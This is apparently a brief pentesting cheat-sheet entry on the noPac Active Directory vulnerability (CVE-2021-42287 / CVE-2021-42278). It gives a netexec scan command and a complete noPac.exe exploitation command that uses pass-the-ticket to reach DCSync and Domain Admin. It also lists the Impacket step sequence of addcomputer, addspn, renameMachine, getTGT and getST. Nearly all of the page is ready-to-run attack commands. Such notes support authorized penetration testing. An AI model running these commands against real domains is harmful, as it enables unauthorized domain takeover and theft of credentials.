githubEdit

SamAccountName / NoPac CVE-2021-42287 / CVE-2021-42278

Scan:

  • netexec smb IP -u USER -p PASSWORD -M nopac

Exploitation

  • .\noPac.exe -domain DOMAIN -user USER -pass PASSWORD /dc DC_FQDN /mAccount MACHINE_ACCOUNT /mPassword MACHINE_PASSWORD /service cifs /ptt (Pass the Ticket to DCSync to Domain Admin)

Alternate method: Impacket

  • addcomputer / addspn / renameMachine / getTGT / renameMachine / getST

Last updated